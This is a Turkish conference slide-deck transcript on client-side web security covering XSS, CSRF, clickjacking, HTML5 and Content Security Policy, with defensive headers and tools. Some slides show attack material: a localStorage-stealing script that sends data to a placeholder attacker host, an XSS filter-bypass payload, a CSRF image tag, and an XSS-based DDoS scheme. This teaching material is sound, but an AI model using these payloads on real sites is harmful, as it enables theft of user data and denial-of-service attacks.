client-side security & csp - mehmet İnce #siberguvenlikkonferansi 14.05.14
DESCRIPTION
Siber Güvenlik Konferansı'14 etkinliğinde Mehmet İnce tarafından gerçekleştirilen sunum dosyasıdır.TRANSCRIPT
![Page 1: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/1.jpg)
Son Kullanıcı Güvenliği &
CSP Mehmet Dursun İNCE
![Page 2: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/2.jpg)
mince@rootlab ~ $ whoami Mehmet Dursun İNCE Penetration Tester at IntelRAD Zafiyet Araştırmacısı Blog Yazarı: www.mehmetince.net Linux & OpenSource PHP, Python, ...
![Page 3: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/3.jpg)
mince@rootlab ~ $ cat icerik.txt Client-Side Security Nedir ? CSRF, XSS ve ClickJacking Internet Tarayıcıları HTML5 SKiddieTrapper.js & CryptoPost.js
![Page 4: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/4.jpg)
Son Kullanıcı Güvenliği Nedir ? ● SSL’den ibaret değildir. ● Güvenli “oturum” yönetimi gerektirir.
● User Interface güvenliği
![Page 5: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/5.jpg)
S.K. Yönelik Popüler Siber Tehditler ● ... ● XSS ● CSRF ● Clickjacking ● ...
![Page 6: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/6.jpg)
XSS XSS <script>alert(1)</script>’den ibaret değildir.
COOKIE değil Browser.
![Page 7: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/7.jpg)
XSS Tehlikeleri - Password Cracking ● HTML5 - WebWorker
● Cracking Speed : 609.384 / sec (MD5)
● Ravan - JavaScript Distributed Computing System
![Page 8: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/8.jpg)
XSS Tehlikeleri - L7 DDoS ● XMLHttpRequest - WebSockets
● www.hedef.com/?search=”a”+”b”
● 10,000 / min
![Page 10: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/10.jpg)
XSS Tehlikeleri - Demo - Step 2 ● Dakika içinde 100 tekil kullanıcı alan web
sitesine ddos.js dosyası Stored XSS vb yöntemler ile yerleştirilir.
● Örneğin : e-ticaret, gazete/haber siteleri. ● Sosyal mühendislik + reklam (JS!) ?
![Page 11: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/11.jpg)
XSS Tehlikeleri - Demo - Step 3 ● http://lab.mehmetince.net adresine giren
Chrome kullanıcıları.
![Page 12: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/12.jpg)
XSS Tehlikeleri - Demo - Step 3 ● Request sunucuya erişecektir, dönen
değerin okunması ve işlemi alınması yasaktır!
![Page 13: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/13.jpg)
XSS Tehlikeleri - Demo - Sonuç ● Ortalama her tarayıcı 10,000 talep / dakika ● Dakika içerisinde 100 tekil kullanıcı alan bir
sitenin ziyaretçileri üzerinden; ● Toplam ≃ 1.200.000 / dakika ● = 200.000 / saniye ● WAF ? Firewall ?
![Page 14: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/14.jpg)
CSRF - Cross Site Request Forgery Özet - HTTP GET; … <img src="//site.com/sing_out"> …
![Page 15: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/15.jpg)
CSRF - Cross Site Request Forgery Özet - HTTP POST;
![Page 16: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/16.jpg)
CSRF - Demo - Step 1 1. Hedef : eticaret sitesi kullanıcıları. 2. Kullanıcı mail adresi değişikliği işleminde
mevcut şifre talep edilmemektedir. 3. Uygulama genelinde CSRF Token
kullanılmamıştır.
![Page 17: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/17.jpg)
CSRF - Demo - Step 2 1. www.herhangibirsite.com adresine aşağıdaki
CSRF Exploit kodları yerleştirilir.
![Page 18: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/18.jpg)
CSRF - Demo - Step 3.1 www.herhangibirsite.com adresini ziyaret eden kullanıcı, farkında olmadan email adresini değiştiren HTTP talebini gönderir.
![Page 19: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/19.jpg)
CSRF - Demo - Step 3.2
EMAIL DOĞRULAMA
![Page 20: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/20.jpg)
CSRF - Demo - Step 4
ŞİFREMİ UNUTTUM
![Page 21: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/21.jpg)
![Page 22: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/22.jpg)
ClickJacking
![Page 23: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/23.jpg)
ClickJacking - Önlemi X-Frame-Options : DENY, SAMEORIGIN, https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
![Page 24: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/24.jpg)
HTML5 Avantajları
● Blacklist Bypass o ... o <video poster=javascript:alert(1)//></video> o …
![Page 25: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/25.jpg)
HTML5 Local Storage <script> localStorage.setItem("email", "[email protected]"); var f = document.getElementById("email"); f.innerHTML=localStorage.getItem("email"); </script>
![Page 26: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/26.jpg)
HTML5 Local Storage <script> for(var i = 0; i < localStorage.length; i++){ var key = localStorage.key(i); var a = new Image(); a.src="http://saldirgan/kaydet.php?key=" + key + "&value=" + localStorage.getItem(key); } </script>
![Page 27: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/27.jpg)
Content Security Policy
![Page 28: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/28.jpg)
Content Security Policy - Özellikler connect-src : WebSocket, XHR, EventSource font-src : https://themes.googleusercontent.com frame-src: https://youtube.com img-src : * -Her şeye izin ver- media-src : *.site.com object-src : self -Flash vb- script-src : ‘self’ ‘unsafe-eval’ ‘unsafe-inline’ style-src : self
![Page 29: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/29.jpg)
Content Security Policy - Örnek
![Page 30: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/30.jpg)
Facebook CSP Örneği
![Page 31: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/31.jpg)
Content Security Policy - Rapor script-src : ‘self’ report-uri : ‘log.php’
![Page 32: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/32.jpg)
X-XSS-Protection X-XSS-Protection: 1; mode=block
![Page 33: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/33.jpg)
CryptoPost.js ● RSA Key Encryption ● POST parametreleri encrypt etmek. ● Hacker’lara ve MITM saldırılarına önlem. ● Opensource ve pull request’e açık. ● https://github.com/mmetince/crypto_post
![Page 34: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/34.jpg)
SKiddieTrapper.js ● Potansiyel saldırganlara tuzak kurmak. ● FORM’lara input’lar enjekte etmekte. ● Opensource ve pull request’e açık. ● https://github.com/mmetince/skiddie_trapper
![Page 35: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/35.jpg)
SKiddieTrapper.js
![Page 36: Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14](https://reader033.vdocuments.mx/reader033/viewer/2022050805/55758924d8b42ae7708b48b6/html5/thumbnails/36.jpg)
Teşekkürler ● www.mehmetince.net ● twitter.com/mmetince